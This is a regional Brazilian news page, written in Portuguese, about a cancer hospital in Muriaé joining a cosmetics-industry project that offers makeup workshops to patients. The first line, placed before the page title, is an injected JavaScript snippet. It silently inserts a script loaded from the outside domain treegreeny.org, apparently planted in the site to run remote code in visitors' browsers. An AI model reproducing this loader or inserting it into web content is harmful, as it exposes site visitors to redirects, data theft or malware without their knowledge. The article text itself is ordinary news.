;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Hospital do Câncer de Muriaé é o segundo de Minas a receber projeto “De bem com você – a beleza contra o câncer”. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Hospital do Câncer de Muriaé é o segundo de Minas a receber projeto “De bem com você – a beleza contra o câncer”.

O Hospital do Câncer de Muriaé da Fundação Cristiano Varella teve o privilégio, nesta segunda e terça-feira, de oficializar sua parceria com a Associação Brasileira da Indústria de Higiene Pessoal, Perfumaria e Cosméticos – ABIHPEC no projeto “De bem com você – A beleza contra o câncer”.

O projeto, criado nos Estados Unidos, foi trazido para o Brasil pelo instituto ABIHPEC em 2011 e busca oferecer às pacientes em tratamento oncológico uma nova forma de olharem pra si mesmas, ajudando sua autoestima e mostrando que elas podem enfrentar essa doença tão bonitas e vaidosas quanto sempre foram, através de oficinas de auto maquiagem e dicas de utilização e lenços e turbantes.

A parceria com nosso Hospital e o auxílio das dezenas de maquiadoras voluntárias, além do apoio das principais empresas de cosmético do mundo, é muito importante para que nossas pacientes possam enfrentar essa luta com mais força.

O presidente e a gerente executiva do instituto ABIHPEC, Claudio Viggiani e Kézia Marques, além da maquiadora voluntária do instituto, Sônia Sawick estiveram presentes no lançamento e puderam fazer parte desse momento tão especial para nosso Hospital.

Em nossa instituição as oficinas devem acontecer uma vez por mês e as pacientes e maquiadoras interessadas em participar podem entrar em contato para se inscreverem com o coordenador do projeto na Fundação, João Motta, através do telefone: (32) 3729-7065.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.